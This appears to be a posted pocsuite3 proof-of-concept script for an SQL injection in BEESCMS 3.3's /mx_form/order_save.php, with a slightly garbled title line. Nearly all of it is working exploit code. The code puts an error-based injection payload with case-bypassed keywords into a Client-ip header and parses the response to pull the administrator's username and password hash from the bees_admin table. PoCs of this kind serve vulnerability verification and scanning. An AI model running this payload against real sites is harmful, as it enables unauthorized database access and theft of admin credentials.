
php 3.2 get order sn,beescms 3.3 /mx_form/order_save.php SQL注入漏洞

狄阳秋
2023-12-01

"""

If you have issues about development, please read:

https://github.com/knownsec/pocsuite3/blob/master/docs/CODING.md

for more about information, plz visit http://pocsuite.org

"""

from pocsuite3.api import Output, POCBase, register_poc, requests, logger

from pocsuite3.api import get_listener_ip, get_listener_port

from pocsuite3.api import REVERSE_PAYLOAD

from pocsuite3.lib.utils import random_str

from requests.exceptions import ReadTimeout

import re

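class DemoPOC(POCBase):
    """pocsuite3 PoC for the BEESCMS 3.3 ``/mx_form/order_save.php`` SQL injection.

    According to ``desc`` (which the framework displays verbatim, hence left in
    Chinese), ``order_save.php`` runs a check on the client-IP value at line 59
    that can be bypassed by changing letter case, and then concatenates that
    value into a SQL statement at line 63.  ``_verify`` therefore sends the
    injection through a ``Client-ip`` request header with upper-case SQL
    keywords, using the MySQL duplicate-entry (``rand(0)`` + ``GROUP BY``)
    error-based trick so one ``bees_admin`` row is leaked inside the echoed
    database error, bracketed by the markers ``qgveq|...|qkagq``.
    """

    vulID = '1249'  # ssvid
    version = '1'
    author = ['chenghs@knownsec.com']
    # The pasted original carried stray soft hyphens (U+00AD) inside this date.
    vulDate = '2014-04-12'
    createDate = '2014-04-18'
    updateDate = '2014-04-18'
    references = ['http://www.wooyun.org/bugs/wooyun-2010-055608']
    name = 'beescms 3.3 /mx_form/order_save.php SQL注入漏洞 POC'
    appPowerLink = 'http://www.beescms.com/'
    appName = 'BEESCMS'
    appVersion = '3.3#'
    vulType = 'SQL Injection'
    desc = '''
    BEESCMS 3.3 /mx_form/order_save.php文件中
    line 59对$ip的检查可以使用大小写绕过,然后在line 63将$ip拼接在SQL语句中
    形成SQL注入漏洞
    '''
    samples = []
    install_requires = ['']

    # Seconds to wait for the target. The original request had no timeout, so a
    # single hung host could stall the whole scan; ``ReadTimeout`` was imported
    # but never handled.
    request_timeout = 10

    # The payload wraps the leaked row in the hex markers 0x7167766571 ("qgveq")
    # and 0x716b616771 ("qkagq") with 0x3a73706c69743a (":split:") between the
    # two columns; this pattern locates exactly that fragment in the page.
    # Raw string: the original ``'\|'`` in a normal string is an invalid escape
    # that newer Pythons warn about. The 32-hex group means only an MD5-style
    # password hash is recognised.
    _LEAK_RE = re.compile(r'qgveq\|(.+):split:([a-fA-F0-9]{32})\|qkagq')

    def _verify(self):
        """Send the injection once and report the leaked admin credentials.

        Returns:
            Output: success carrying ``{'Database': {'Username': ..., 'Password': ...}}``
            when the marker-bracketed row appears in the response body; fail
            otherwise, including when the target does not answer in time.
        """
        result = {}
        # rstrip so a target given with a trailing slash does not produce '//'.
        url = self.url.rstrip('/') + '/mx_form/order_save.php'

        # Keep the SQL keyword casing exactly as written: per ``desc`` the line-59
        # filter is defeated by letter case, so lower-casing the payload would
        # re-enable it. The header name is presumably read by PHP as
        # HTTP_CLIENT_IP (not visible here), which is why a plain header
        # reaches the vulnerable variable.
        headers_fake = {
            'Client-ip': (
                "127.0.0.1',(SELECT 1 FROM (SELECT count(1),"
                "concat(round(rand(0)),(SELECT concat(0x71677"
                "66571,0x7c,admin_name,0x3a73706c69743a,admin"
                "_password,0x7c,0x716b616771) FROM bees_admin"
                " LIMIT 0,1))a FROM information_schema.tables"
                " GROUP by a)b))#"
            ),
        }
        # Minimal valid form submission so the script reaches the SQL statement.
        data = (
            'form_id=5&fields%5Bmail%5D=1&fields%5Busername%5D=1&fields%5Btel%'
            '5D=1&fields%5Bweb_contact%5D=1&fields%5Baddress%5D=1&fields%5Bcon'
            'tent%5D=1&lang=cn&f_id=23&submit=%E6%8F%90%E4%BA%A4'
        )

        try:
            r = requests.post(url, data=data, headers=headers_fake,
                              timeout=self.request_timeout)
        except ReadTimeout:
            logger.warning('%s did not answer within %ss', url, self.request_timeout)
            return self.parse_output(result)

        leaked = self._LEAK_RE.findall(r.text)
        if leaked:
            username, password_hash = leaked[0]
            result['Database'] = {
                'Username': username,
                'Password': password_hash,
            }
        return self.parse_output(result)

    def parse_output(self, result):
        """Wrap ``result`` in a pocsuite3 ``Output``.

        Args:
            result: dict filled by ``_verify``; empty means not vulnerable.

        Returns:
            Output: ``success(result)`` when ``result`` is non-empty, else
            ``fail('target is not vulnerable')``.
        """
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')
        return output

    def _attack(self):
        """Attack mode is the same single leaking request as verify mode."""
        return self._verify()

    def _shell(self):
        """No shell stage: this PoC only reads one row from the database."""
        pass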

# Hand the PoC class to the pocsuite3 framework so it is discovered and run.
register_poc(DemoPOC)
